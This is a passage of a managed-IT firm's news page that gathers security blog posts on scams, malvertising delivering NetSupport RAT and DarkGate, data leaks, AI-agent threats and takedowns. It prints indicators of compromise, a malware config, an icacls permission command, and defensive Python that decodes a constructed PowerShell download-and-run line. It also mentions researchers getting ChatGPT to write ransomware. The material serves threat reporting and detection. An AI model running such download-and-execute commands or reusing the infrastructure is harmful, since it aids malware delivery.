IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

New scams could abuse brief USPS suspension of inbound packages from China, Hong Kong

I would be the last one to provide scammers with good ideas, but as a security provider, sometimes we need to think like criminals to stay ahead in the race.

Recently, the US Postal Service (USPS) announced that it would suspend inbound packages from China and Hong Kong until further notice. That further notice, it turned out, was very short indeed, with the USPS announcing on February 5 that the interruption in service would itself be disrupted—packages were once again approved to enter the country. But the whiplash announcements, the second of which was dropped with little fanfare, have caused confusion.

So, there is an opportunity for scammers to exploit that confusion and uncertainty. Let me spell out how:

  • Scammers could send messages about refunds based on packages that could not be sent.
  • A revival of the old “Your package could not be delivered” scam could spring up.
  • Phishers could send messages about goods that were rerouted through other countries.
  • Goods—including counterfeit—could be offered for sale at “pre-tariff” rates.
  • Malicious messages could claim to arrive from the shipper, the e-commerce platform, or Customs, asking for additional information to get a package released.
  • Cybercriminals may set up fake USPS sites—as they have done in the past—to intercept searches for Track & Trace information.

Scammers are always looking to make money off other people’s backs. They will usually inject some kind of urgency into their messaging, such as a deadline before which you have to respond. This is a good indicator, because they don’t want you to think things through before you act.

How can you stay safe?

It’s best not to respond to any of these attempts, to avoid letting scammers know that someone is reading their messages; a reply will likely cause an increase in spam and further attempts.

Depending on how the scam reaches you and what it is after, there are several ways to stay safe.

  • Use a solution that offers text protection and text message filtering.
  • Do not click on unsolicited links or open unsolicited attachments.
  • Do not trust that sponsored ads lead to the legitimate company; we are seeing too many fakes.
  • Do not trust links that use URL shorteners, or at least unshorten the link before following it. The same is true for QR codes, which are basically URLs in a different shape.
  • Double-check the source of messages through a trusted channel of communication with the shipper, e-commerce platform, or customs.

And please report fraud attempts to the Internet Crime Complaint Center (IC3), so others can be warned about common scams.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

University site cloned to evade ad detection distributes fake Cisco installer

There is a constant “cat and mouse” game between defenders and attackers, the latter trying to outsmart and get a head start on the former. In the context of online advertising, this involves creating fake identities or using stolen ones to push out malicious ads.

An attacker not only needs to evade detection but also create a lure that will be convincing to most people. In this blog post, we focus on what malvertisers use in almost all of their campaigns, namely decoys, also known as “white pages”, in order to fool the advertising entity.

The particular case is a malicious Google ad for Cisco AnyConnect, a tool often used by employees to remotely connect to company networks, but also by universities. In fact, we found that threat actors were using the name of a German university to create a fake website designed not to fool actual victims, but rather to bypass detection from security systems.

To be sure, victims were part of the overall scheme, but they were instead redirected to a lookalike Cisco site linking to a malicious installer containing the NetSupport RAT remote access Trojan.

The perfect disguise

The malicious ad comes up from a Google search for the keywords “cisco annyconnect”. The ad displays a URL that looks somewhat convincing, for the domain anyconnect-secure-client[.]com. We should note that this domain was registered less than a day before the ad appeared.

[Image: the malicious Google ad displaying the anyconnect-secure-client[.]com URL]

Upon clicking on the ad, server-side checks will determine whether this is a potential victim or not. Typically, a real victim has a residential IP address and other network settings that differentiate it from crawlers, bots, VPNs or proxies.

In recent times, we have seen criminals rely on AI to generate fake pages that look innocuous. These are also referred to as “white pages” and they do serve an important purpose: if the decoy is obviously fake, it will raise suspicion. We thought that in this case the perpetrator had a rather clever idea by stealing content from a university that actually does use Cisco AnyConnect.

[Image: the decoy “white page” copied from the university website]

Technische Universität Dresden (TU Dresden) is a public research university in Germany whose site can be found here. Funnily enough, the threat actors left a trail while doing their copy/paste: they added the cookie opt-in notification that is required for websites in Europe, which here leaked their browser language (Russian).

[Image: the cookie opt-in notice added to the copied page, showing the Russian browser language]

Real victims get infected with malware

As good as this template looks, real victims will never see it. Instead, upon connecting to the malicious server they will be immediately redirected to a phishing site for Cisco AnyConnect.

The payload is downloaded in a similar way to a campaign we had already observed before, using a PHP script that provides the direct download URL. We can see from the network traffic capture below that the file is hosted on a likely compromised WordPress site.

[Image: network traffic capture showing the PHP script returning the download URL and the payload hosted on the WordPress site]

There is not much to be said about the fake installer other than it being digitally signed with a valid certificate. Upon execution it extracts client32.exe, a name notorious for being associated with NetSupport RAT.

cisco-secure-client-win-5.0.05040-core-vpn-predeploy-k9.exe
-> client32.exe
-> "icacls" "C:ProgramDataCiscoMedia" /grant *S-1-1-0:(F) /grant Users:(F) /grant Everyone:(F) /T /C

The remote access Trojan connects to the following two IP addresses: 91.222.173[.]67 and 199.188.200[.]195, further granting a remote attacker access to the victim’s machine.

Conclusion

Brand impersonation is a common theme with search ads. As Google enforces various policies and uses algorithms to detect malicious activity, threat actors need to constantly come up with new ideas.

Reusing a university page was a clever idea, but there were a couple of things that made this attack shy of being perfect. The domain name, while very strong for impersonation, was newly registered. Since it was part of the ad’s display URL, it could have potentially been detected by Google. We also noted that the perpetrators left a trail when they copy/pasted the code from the university website, which identified their likely country of origin.

Having said that, the malware payload was digitally signed and had few detections when first seen, so this attack may have had a decent success rate.

As always, we recommend that users take precautions whenever looking up programs to download, and to be especially wary of sponsored results.


Indicators of Compromise

Malvertising infrastructure

anyconnect-secure-client[.]com
cisco-secure-client[.]com[.]vissnatech[.]com

NetSupport RAT download

berrynaturecare[.]com/wp-admin/images/cisco-secure-client-win-5[.]0[.]05040-core-vpn-predeploy-k9[.]exe
78e1e350aa5525669f85e6972150b679d489a3787b6522f278ab40ea978dd65d

NetSupport RAT C2s

monagpt[.]com
mtsalesfunnel[.]com
91.222.173[.]67/fakeurl.htm
199.188.200[.]195/fakeurl.htm

Small business owners, secure your web shop

An online shop is more than just another way to sell your products. It comes with a responsibility to keep the web shop secure.

Cybercriminals are looking to steal your customers’ credit card details, their personal data, and even your revenue.

And it’s not as if using a platform that is used by major retailers makes it safe. Platforms like Shopify, Wix, and Magento are always under scrutiny from cybercriminals who are looking for a vulnerability that allows them to insert skimmers or get access to your database.

Let’s look at some examples to demonstrate my point.

A cybercriminal specializing in breaching Shopify stores is posting huge data sets as free downloads. Using the moniker ShopifyGUY, which implies they specialize in Shopify sites, the cybercriminal posted a few datasets containing millions of customer records.

[Image: forum post offering the boAt Lifestyle data breach as a free download]

For example, boAt is reportedly India’s most active company marketing audio-focused electronic gadgets. ShopifyGUY dumped files from a data breach containing the PII of boAt customers, with 7,550,000 entries.

[Image: forum post offering the Piping Rock data for download]

ShopifyGUY also uploaded the Piping Rock database, containing 2.1 million email addresses from the online health products store Piping Rock.

We found several Magento-based web shops that had skimmers injected into their code, busy stealing credit card information. One of them even infected visitors with the SocGholish malware, a sophisticated JavaScript malware framework that has been actively used by cybercriminals since at least 2017. It tricks users into running a script supposedly meant to update their browser. What it actually does is infect the machine and send the details back to a human operator, who can decide how best to monetize it. Lately, SocGholish has been found to install information stealers on both Windows and Mac machines.

How to secure your web shop

The most common attacks web shop owners need to worry about are:

  • Credential phishing where the criminals try to steal your login credentials.
  • Malware injection where the criminals inject malicious code into your web shop by abusing a vulnerability in the platform itself or a plug-in.
  • Brute force attacks, where the criminals try a whole bunch of passwords they obtained from other breaches.

So, to keep your web shop safe you should:

  • Be extra vigilant when it comes to phishing attempts.
  • Keep your software up to date.
  • Protect the device(s) you use to log in with an active anti-malware solution.
  • Make it harder to log in by using multi-factor authentication (MFA) and by not re-using passwords.
  • Regularly check your website for additional code, especially the payment section.
  • If you run the web shop on your own server, use web application firewalls (WAF) to detect and block malicious traffic.
  • Do not store customer details that you no longer need.
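As an added example of the “regularly check your website for additional code” step above (this is not the post’s own code), the script below inventories the script tags on a saved copy of a checkout page and diffs them against a baseline recorded while the page was clean; the HTML and host names are constructed placeholders.

```python
"""Baseline check for unexpected scripts on a web shop's payment page.

Lists every <script> on a saved copy of the checkout page (third-party hosts
for external scripts, SHA-256 for inline bodies), records a baseline from a
capture known to be clean, and reports anything that later differs. The HTML
below is constructed and the host names are placeholders."""
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def inline_hash(body: str) -> str:
    """Hash of an inline script body, ignoring surrounding whitespace."""
    return hashlib.sha256(body.strip().encode()).hexdigest()


def script_inventory(html: str, shop_host: str) -> Tuple[Set[str], Set[str]]:
    """Third-party hosts and inline-script hashes present on the page.
    Relative src values are first-party and therefore not listed as hosts."""
    p = ScriptCollector()
    p.feed(html)
    hosts = {urlparse(s).netloc for s in p.external}
    hosts.discard("")          # relative URL
    hosts.discard(shop_host)   # absolute first-party URL
    return hosts, {inline_hash(b) for b in p.inline}


def audit_checkout_page(html: str, shop_host: str,
                        baseline: Tuple[Set[str], Set[str]]) -> Dict[str, List[str]]:
    """Report hosts and inline scripts that were not in the clean baseline."""
    known_hosts, known_inline = baseline
    hosts, inline = script_inventory(html, shop_host)
    return {"unknown_hosts": sorted(hosts - known_hosts),
            "unknown_inline": sorted(inline - known_inline)}


# --- Constructed sample (placeholder hosts) ----------------------------------
SHOP_HOST = "shop.example.com"
CLEAN_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://pay.example.net/v3/"></script>
<script>window.checkout = {"currency": "USD"};</script>
</head><body><form id="payment"></form></body></html>"""
# A later capture of the same page with two additions the shop owner did not make.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script>document.forms.payment.addEventListener("submit", collect);</script>\n'
    '<script src="https://cdn-stats.example.org/ga.js"></script>\n</head>')
BASELINE = script_inventory(CLEAN_PAGE, SHOP_HOST)  # recorded while clean

if __name__ == "__main__":
    print(audit_checkout_page(CLEAN_PAGE, SHOP_HOST, BASELINE))
    print(audit_checkout_page(INJECTED_PAGE, SHOP_HOST, BASELINE))
```

Run it on a regular schedule against a fresh capture of the live checkout page and alert on any non-empty result; a changed inline hash after a legitimate deploy just means the baseline needs re-recording.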

Your customers will probably not thank you for your efforts, but they will come complaining if you spill their data.

For readers who would like to check whether their credentials are included in one of the data breaches, Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

Valley News Live exposed more than a million job seekers’ resumes

Making your own bad news is not what Valley News Live had in mind, but negligence comes at a price.

Cybernews researchers found an unprotected AWS S3 bucket that belongs to Valley News Live, a North Dakota-based television station. Gray Television, the owner of Valley News Live, is the third largest broadcasting company in the US.

An S3 bucket is like a virtual file folder in the cloud where you can store various types of data, such as text files, images, videos, and more. There is no limit to the amount of data you can store in an S3 bucket, and individual objects can be up to 5 TB in size.

In this case, the bucket stored over 1.8 million files, of which over a million were resumes sent to the station between 2017 and 2024.

The leaked data included:

  • Full names
  • Phone numbers
  • Email addresses
  • Home addresses
  • Dates of birth
  • Nationality and places of birth
  • Social media links
  • Employment history
  • Educational background

As you can imagine, these resumes represent a treasure trove for phishers and other cybercriminals.

What do I need to do?

Stolen resumes are bad news, as they can be used for financial fraud, identity theft, and cause privacy issues.

With all the details a phisher can find in a resume, they can make their social engineering attempts very convincing. They can also impersonate the person in the resume to defraud people they know, or perform a SIM swap by tricking the victim’s carrier into helping them illegally take over the cell phone number and re-route it to a phone under the attacker’s control.

It also opens the victim up to financial fraud, such as a criminal setting up fraudulent bank accounts in their name, applying for loans or credit cards, filing false tax returns, and using the victim’s identity to obtain employment.

And if the job application was recent enough, a phisher could probably trick the victim into downloading malware under the guise of engaging in the hiring process. For example, by clicking a malicious link or opening an attachment.

So, if you sent an application to Valley News Live, it would be wise to exercise your right to have your information removed and hope that no real criminals have found the leaky bucket by now.

Cybernews states it contacted Valley News Live multiple times but received no response.


New AI “agents” could hold people for ransom in 2025

A paradigm shift in technology is hurtling towards us, and it could change everything we know about cybersecurity.

Uhh, again, that is.

When ChatGPT was unveiled to the public in late 2022, security experts looked on with cautious optimism, excited about the new technology but concerned about its use in cyberattacks. But two years on, much of what ChatGPT and other generative AI chat tools offer attackers is a way to improve what already works, not new ways to deliver attacks themselves.

And yet, if artificial intelligence achieves what is called an “agentic” model in 2025, novel and boundless attacks could be within reach, as AI tools take on the roles of “agents” that independently discover vulnerabilities, steal logins, and pry into accounts.

These agents could even hold people for ransom by matching stolen data online with publicly known email addresses or social media accounts, composing messages and holding entire conversations with victims who believe a human hacker out there has access to their Social Security Number, physical address, credit card info, and more. And if the model works for individuals, there’s little reason it wouldn’t work for individual business owners.

This warning comes from our 2025 State of Malware report, which compiled a year’s worth of intelligence to identify the most pressing cyberattacks on the horizon. Though the report’s guidance serves IT teams, its threats will impact individuals and small businesses everywhere. Remember that just last year a widespread IT outage grounded flights globally, cementing the relationship between companies, cybersecurity, and everyday people.

In 2025, agentic AI may further reveal just how closely tied everyone is in the battle for cybersecurity. Here’s what we might expect.

You can find the full 2025 State of Malware report here.

The generative AI non-revolution

The November 2022 launch of ChatGPT ushered forth a new relationship with our computers. No longer would we need to use our laptops, smartphones, and tablets to record or assist our creative work. Now, we could make those same machines complete the creative work for us.

AI image tools like Midjourney and DALL-E can create images when given simple text prompts. They can even mimic the styles of famous artists, like Van Gogh, Rembrandt, and Picasso. AI chat tools like ChatGPT, Google Gemini, and Claude—from OpenAI competitor Anthropic—can brainstorm ideas for marketing materials, write book reports, compose poems, and even review human-written text for legibility. These tools can also answer an endless array of factual questions, much like the separate AI tool Perplexity, which advertises itself not as a “search engine,” but as the world’s first “answer engine.”

This is the potential of “generative AI,” a term used to describe AI tools that can generate text, images, movies, summaries, and more, limited only by our imagination.

But where has that imagination brought us?

For unimaginative users, generative AI has made it easier to cheat in college classes and to abuse social media engagement algorithms to gain brief virality—hardly inspiring. And for malicious users, hackers, and scammers, generative AI has delivered oil-slick efficiency to proven attack methods.

Generative AI tools can more convincingly write phishing emails so that the tell-tale signs of a scam—like misspellings and clumsy grammar—are all but gone. The same is true for all text-based social engineering tricks, as AI chat tools can write alluring direct messages for romance scams and craft urgent-sounding texts that can fool people into clicking on links that carry malware.

Importantly, the attack methods here are not new. Instead, they’ve simply become easier to scale with the use of AI. But sometimes the AI pushes back.

With limitless, advertised potential, even tools like ChatGPT have boundaries, often precluding users from producing materials that could cause harm. In 2023, Malwarebytes Labs subverted these boundaries to successfully get ChatGPT to write ransomware, twice.

Because of these prohibitive rules, a set of malicious copycat AI tools can now be found online that will produce text and images that often break the law. One example is in the creation of “deepfake nudes,” which utilize AI technology to digitally stitch the face of one person onto another person’s nude body, creating fake nude “photographs.” Deepfake nudes have caused multiple crises across high schools in America, serving as a new type of ammunition for old weaponry: Blackmail.

The ability to create false text, images, and even audio has also allowed cybercriminals to create more believable threats when fraudulently posing as CEOs or executives to convince employees to, say, sign a bogus contract or hand over a set of important account credentials.

These are real threats, but they are not novel. As we wrote in the 2025 State of Malware report:

“The limited impact of AI on malware stems from its current capabilities. Although there are notable exceptions, generative AIs tend to provide efficiency rather than brand new capabilities. Cybercrime is a very mature field that relies on a set of well-established tools, such as phishing, information stealers, and ransomware that are already feature complete.”

That could change in 2025.

“Agentic” AI and a new landscape of attacks

Agentic AI is the next big thing in artificial intelligence, even if you’ve never heard about it before.

Google, Amazon, Meta, Microsoft, and more have all begun experimenting with the technology, which promises to take AI out of its current chatbot silo and into a new landscape where individualized AI “agents” can help with specific tasks. These agents could, for example, more effectively respond to simple customer support questions, help patients find in-network providers with their health insurance, and even suggest strategy based on a company’s most recent performance. Microsoft, for its part, has already teased its AI agent that answers employee questions around HR policies, holiday schedules, and more. Salesforce, too, is investing heavily in agentic AI, positioning the technology as a personal assistant for everyone.

As we wrote in the 2025 State of Malware report:

“If agentic AIs arrive in 2025, they won’t just answer questions, they will be able to think and act, transforming AI from an assistant that responds to prompts, into a peer, or even an expert that can plan out tasks, interact with the world, and solve the problems it encounters.”

The implications for cyberattacks are enormous. If put into the wrong hands, malicious attackers could ask AI agents to:

  • Search vast troves of stolen data to match leaked Social Security numbers with leaked email addresses, composing and sending phishing emails that threaten more data exposure unless a ransom is paid.
  • Scrape public social media feeds for baby photos that are delivered to other AI agents that create fake profiles that weaponize those baby photos as empty threats against a child’s safety.
  • Scour LinkedIn to create a database of potentially viable email addresses from countless companies by deducing the email address format—first name, last name; first initial, last name; etc.—from publicly listed email addresses, and then mirroring that format to write and send bogus requests from executives to their direct reports.
  • Comb through public divorce records across multiple states and countries to identify targets for romance scams, who receive messages and who can carry on with whole conversations composed and controlled by another AI agent.

These attacks threaten not only individuals but small businesses, too, as a vulnerability in a person’s device can become a malware attack on a network. The same is true in reverse—if attacks on companies become more accessible, then the data that people give these companies becomes more vulnerable to exposure.

Thankfully, where agentic AI poses a risk, it also poses a boon, as individual AI agents could be tasked with finding a company’s vulnerabilities, responding to suspicious activity on its network, and even guiding everyday people into safely posting online, searching the web, and buying from unknown retailers.

The truth is that AI is here to stay. There is already too much investment from the largest developers and companies for that to reverse course any time soon. So, if the threat is that attackers might harness this AI, then the foreseeable future will involve a lot of defenders and everyday people harnessing it, too.


WhatsApp says Paragon is spying on specific users

WhatsApp has accused the professional spyware company Paragon of spying on a select group of users.

WhatsApp, the Meta-owned, end-to-end encrypted messaging platform, said it has reliable information that nearly 100 journalists and other “members of civil society” were targets of a spyware campaign conducted by the Israeli spyware company.

“Members of civil society” usually refers to individuals and organizations that operate independently from government and business sectors, often those advocating for public interests, influencing policy, or holding governments accountable.

In a statement, a WhatsApp spokesperson said:

“This is the latest example of why spyware companies must be held accountable for their unlawful actions. WhatsApp will continue to protect people’s ability to communicate privately”

Many such targets use WhatsApp because they rely on the end-to-end encryption (E2EE) that it offers by default to safeguard communications, protect sources, and shield sensitive information from prying eyes.

The targets were spread over two dozen countries, including several in Europe. WhatsApp notified the possibly affected accounts through its own app. The platform has the ability to notify users about sensitive matters directly via a WhatsApp chat. In such a case, the chat includes a system message at the top that verifies it originates from the official WhatsApp Support account, and there is a blue checkmark next to WhatsApp Support at the top of the chat.

A spokesperson stated that WhatsApp was able to identify and block the attack vector which Paragon used in these attacks. Reportedly, the hacking campaign used malicious PDFs sent via WhatsApp groups to compromise targets. The attack apparently required no action from the target, a so-called zero-click attack.

Researchers have often compared Paragon’s Graphite spyware to the Pegasus spyware, a deeply invasive tool developed by a company called NSO that WhatsApp has been fighting in court since 2019. But up until now, Paragon was able to keep a low profile. This is the first time that Paragon has been publicly linked to a hacking campaign that allegedly targeted journalists and members of civil society.

WhatsApp has sent Paragon Solutions a cease-and-desist letter following the series of attempted attacks. Meta also notified Canadian privacy watchdog Citizen Lab. Citizen Lab’s researcher John Scott-Railton says they observed this campaign and have started an investigation.

The attacks reportedly took place in December 2024. If you are a potential target and you received a suspicious PDF you can reach out to Citizen Lab or the non-profit digital security helpline AccessNow.

If you received a WhatsApp notification about the attack, you can contact WhatsApp Support in-app by clicking here.


ClickFix vs. traditional download in new DarkGate campaign

During the past several months there have been numerous malware campaigns that use a technique referred to as “ClickFix”. It often consists of a fake CAPTCHA or similar traffic validation page where visitors are instructed to paste and execute code in order to proceed.

We have started to see ClickFix attacks more and more via malicious Google ads as well. This is in contrast to typical phishing pages where victims download a so-called installer that contains malware.

In a recent malvertising campaign targeting the Notion brand, we observed both techniques at play. It’s quite possible the threat actors were collecting metrics to determine which of the two gave them the most conversions via malware installs.

This blog post details this campaign that ultimately delivered the DarkGate malware loader.

Overview

[Image: campaign overview diagram]

Web traffic view

[Image: web traffic view of the campaign]

Delivery #1: PowerShell code via “ClickFix”

Malicious ad and social engineering

Threat actors created a Google ad for the popular utility application Notion. The first time we clicked on the ad, we were redirected to a site showing a “Verify you are human” page, also known as Cloudflare Turnstile. Except this was not the real Cloudflare, and merely a social engineering trick.

[Image: fake Cloudflare Turnstile “Verify you are human” page]

The HTML source code was obfuscated to only show gibberish interlaced with Russian comments, which we later determined was Rot13, a letter substitution cipher. This was likely used to hide the offending code from prying eyes and network rules:

[Image: Rot13-obfuscated HTML source interlaced with Russian comments]

After checking the box to verify we are human, we see new instructions, “Verification steps”, that involve pressing a number of key combinations. Windows + R launches the run dialog while Ctrl + V will paste whatever is in the clipboard. Supposedly this code is part of the verification process, but instead when pressing Enter, the victim will run a malicious command:

[Image: “Verification steps” instructing the visitor to press Windows + R, Ctrl + V and Enter]

PowerShell and payload

The code copied into the clipboard is actually a command line that runs PowerShell:

[Image: the clipboard content, a command line that runs PowerShell]

The Base64 encoded string retrieves the following code from hxxps[:]//s2notion[.]com/in.php?action=1:

[Image: the code retrieved from in.php?action=1]

This downloads a binary from hxxps[:]//s2notion[.]com/in.php?action=2 and runs it. That file contains an AutoIt script that is launched with:

"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x

The following DarkGate configuration was extracted from it:

{'DarkGate': {'C2': [['155.138.149.77']],
              'unknown_8': ['No'],
              'name': ['DarkGate'],
              'unknown_12': ['R0ijS0qCVITtS0e6xeZ'],
              'unknown_13': ['6'],
              'unknown_14': ['Yes'],
              'port': ['80'],
              'startup_persistence': ['Yes'],
              'unknown_32': ['No'],
              'check_display': ['Yes'],
              'check_disk': ['No'],
              'min_disk_size': ['100'],
              'check_ram': ['No'],
              'min_ram_size': ['4096'],
              'check_xeon': ['No'],
              'unknown_21': ['No'],
              'unknown_23': ['Yes'],
              'unknown_31': ['No'],
              'unknown_24': ['N-traff'],
              'campaign_id': ['user1'],
              'unknown_26': ['No'],
              'xor_key': ['sDcGdADE'],
              'unknown_28': ['No'],
              'unknown_29': ['2'],
              'unknown_35': ['No'],
              'tabla': ['a2THNyA]7u6Kiv$8k.F*ZrO"do1wL9P0 3}eCGDY{XVzctg,&EhJfsx=n)mpQUqljIW5SRMb4B([']}}
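The two stages of this delivery (the Rot13-obfuscated lure page that fills the clipboard, and the PowerShell command the victim pastes into the Run dialog) can be triaged by defenders with the following added example, which is not code from the original post; the lure HTML, the process-creation events and the example.invalid URL are constructed for illustration.

```python
"""Triage helpers for the ClickFix chain: a ROT13-obfuscated lure page that
writes a PowerShell command to the clipboard, and the resulting
process-creation event where explorer.exe (the Run dialog) starts
powershell.exe with an encoded command that fetches more code.
All sample inputs below are constructed; the URL is a placeholder."""
import base64
import codecs
import re
from typing import Dict, List

# Strings whose presence in the decoded page source indicates the lure.
PAGE_MARKERS = ("navigator.clipboard.writeText", "powershell", "-enc",
                "Win + R", "Ctrl + V")
# PowerShell switches used to hide the window and pass a Base64 payload.
PS_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\b|nop\b|noprofile\b)",
    re.I)
# Download-cradle verbs looked for after decoding the Base64 block.
CRADLE_MARKERS = ("iwr", "invoke-webrequest", "downloadstring",
                  "iex", "invoke-expression")


def rot13(text: str) -> str:
    """ROT13 is an involution, so the same call encodes and decodes."""
    return codecs.decode(text, "rot_13")


def scan_page_source(html: str) -> List[str]:
    """Return lure markers found in the HTML as-is and after ROT13, since the
    campaign hid its script body behind that substitution."""
    found = []
    for label, candidate in (("plain", html), ("rot13", rot13(html))):
        lowered = candidate.lower()
        found += [f"{label}:{m}" for m in PAGE_MARKERS if m.lower() in lowered]
    return found


def decode_encoded_command(cmdline: str) -> str:
    """Decode the Base64 argument after -e / -enc / -EncodedCommand.
    PowerShell expects UTF-16LE here, so an ASCII decode would look garbled."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_process_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event (Sysmon event 1 / 4688 style fields).
    Two or more independent signals mark it suspicious."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent.endswith("\\explorer.exe") and image.endswith("\\powershell.exe"):
        reasons.append("powershell.exe started by explorer.exe (Run dialog)")
    if PS_FLAGS.search(cmd):
        reasons.append("hidden-window / encoded-command switches")
    decoded = decode_encoded_command(cmd)
    if any(m in decoded.lower() for m in CRADLE_MARKERS):
        reasons.append("decoded command downloads and executes remote content")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons,
            "decoded": decoded}


# --- Constructed samples (placeholder URL, not the campaign's own) -----------
CRADLE = "iwr http://example.invalid/in.php?action=1 | iex"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
CLIPBOARD_CMD = f"powershell -w hidden -enc {ENCODED}"
# The lure page as captured: the script body is ROT13-encoded.
LURE_HTML = ("<html><body><h1>Verify you are human</h1><script>"
             + rot13(f'navigator.clipboard.writeText("{CLIPBOARD_CMD}");'
                     " // Win + R, Ctrl + V, Enter")
             + "</script></body></html>")
RUN_DIALOG_EVENT = {
    "ParentImage": "C:\\Windows\\explorer.exe",
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": CLIPBOARD_CMD,
}
BENIGN_EVENT = {
    "ParentImage": "C:\\Windows\\System32\\cmd.exe",
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "powershell -File C:\\scripts\\nightly-backup.ps1",
}

if __name__ == "__main__":
    print(scan_page_source(LURE_HTML))
    print(triage_process_event(RUN_DIALOG_EVENT))
    print(triage_process_event(BENIGN_EVENT))
```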

Delivery #2: signed executable

Malicious ad and decoy site

We saw this scenario after revisiting the malicious ad for a second time. Notice how the URL path is now including “/download/”.

[Image: the malicious Notion ad with “/download/” in its URL path]

This is the more traditional approach to malvertising for software downloads that we’ve seen for a while now. Victims download an executable after being tricked with a lookalike site. The file was found hosted on GitHub under the user profile herawtisabela1992:

[Image: the fake Notion download site and the GitHub-hosted file]

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Similar to the other binary mentioned in the first delivery technique, this one also extracts an AutoIt payload, with the same DarkGate configuration.

It’s interesting to note that the same GitHub user account previously distributed a backdoor called Warmcookie (aka Badspace) from:

raw[.]githubusercontent[.]com/herawtisabela1992/check/refs/heads/main/920836164_x64.exe

Conclusion

We were not surprised to see the ClickFix social engineering attack here, but what made this campaign interesting was that it alternated between ClickFix and the typical file download.

It’s quite likely someone is tracking stats and comparing numbers to see which of the two delivery methods yields the most successful installs. If we had to put our money on it, we would bet that ClickFix is ahead. The file download technique remains effective, especially if the payload is digitally signed, but it could be relegated to second place in the near future.

Malwarebytes detects both payloads as Trojan.Dropper and Backdoor.DarkGate.


Indicators of Compromise

Malvertising infrastructure

notionbox[.]org
s2notion[.]com

Payloads

6b6676267c70fbeb3257f0bb9bce1587f0bdec621238eb32dd9f84b2bcd7e3ea
4fe8bbc88d7a8cc0eec24bd74951f1f00b5127e3899ae53de8dabd6ff417e6db

Cybercrime gets a few punches on the nose

It’s not often that we get to share good news, so we wanted to grab this opportunity and showcase some progress made by law enforcement actions against cybercrime with you.

Europol notified us about the take-down of two of the largest cybercrime forums in the world. With over 10 million users, Nulled and Cracked serviced cybercriminals from all over the world with a quick entry point into the cybercrime scene.

On the forums people not only discussed how to optimize their cybercrime efforts but also provided several cybercrime-as-a-service options, including data, malware, and hacking tools.

Law enforcement agencies not only seized the forums but also managed to take down associated services like the money launderer Sellix and a “bulletproof” hosting service called StarkRDP, which enjoyed heavy promotion on both platforms and was operated by the same suspects.

Bulletproof hosting refers to web hosting services that cater specifically to cybercriminals by allowing them to host illegal activities and content. These hosting providers promise anonymity, operate with very few rules, and typically ignore requests from law enforcement to remove harmful or illegal material.

These two forums also offered AI-based tools and scripts to automatically scan for security vulnerabilities and optimize attacks.

This operation was an international effort supported by Europol and the Federal Bureau of Investigation (FBI) involving law enforcement from Australia, France, Germany, Greece, Italy, Spain, and Romania.

In a separate action, Dutch police and the US Department of Justice (DOJ) dismantled an international cybercrime network called HeartSender (aka Saim Raza or The Manipulators). This crime network specializes in developing and selling phishing kits. Their tools to power spam campaigns attracted thousands of customers interested in sending vast amounts of phishing emails, stealing login credentials, and exploiting compromised systems.

Law enforcement seized a total of 39 domains and servers belonging to HeartSender in an international effort. The law enforcement agencies remotely disabled the illegal software sold through these servers. On the servers the police also found datasets including millions of victim records.

But they also found buyer records, which will be subject to a follow-up operation. Operations like HeartSender, Nulled, and Cracked make cybercrime accessible to aspiring criminals who have no working knowledge of programming or other computer skills. As always, we’ll have to wait and see how effective such actions are in the long run. As we all know, these “enablers” have a tendency to grow back in other places; they care about neither their customers nor their victims, only their Bitcoin wallets. But for now, it will take them some time to get back in action—time they can’t spend defrauding innocent victims.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Microsoft advertisers phished via malicious Google ads

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft advertisers. These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft’s advertising platform.

Microsoft does purchase ad space on its rival’s dominant search engine; however, we found Google sponsored results for “Microsoft Ads” (formerly known as Bing Ads) that contained malicious links created by impostors.

Through shared artifacts, we were able to identify additional phishing infrastructure targeting Microsoft accounts going back at least a couple of years. We have reported these incidents to Google.

Microsoft made an estimated $12.2 billion in search and news advertising revenues (including Bing) in 2023, which pales in comparison to its rival Google, which holds a much larger share of the search engine market.

Since the advertising ecosystem allows for open competition between brands, Microsoft is trying to get traffic and earn clicks from Google searches. During our investigation, we saw sponsored results for Microsoft Ads and Bing Ads that managed to slip through Google’s security checks:

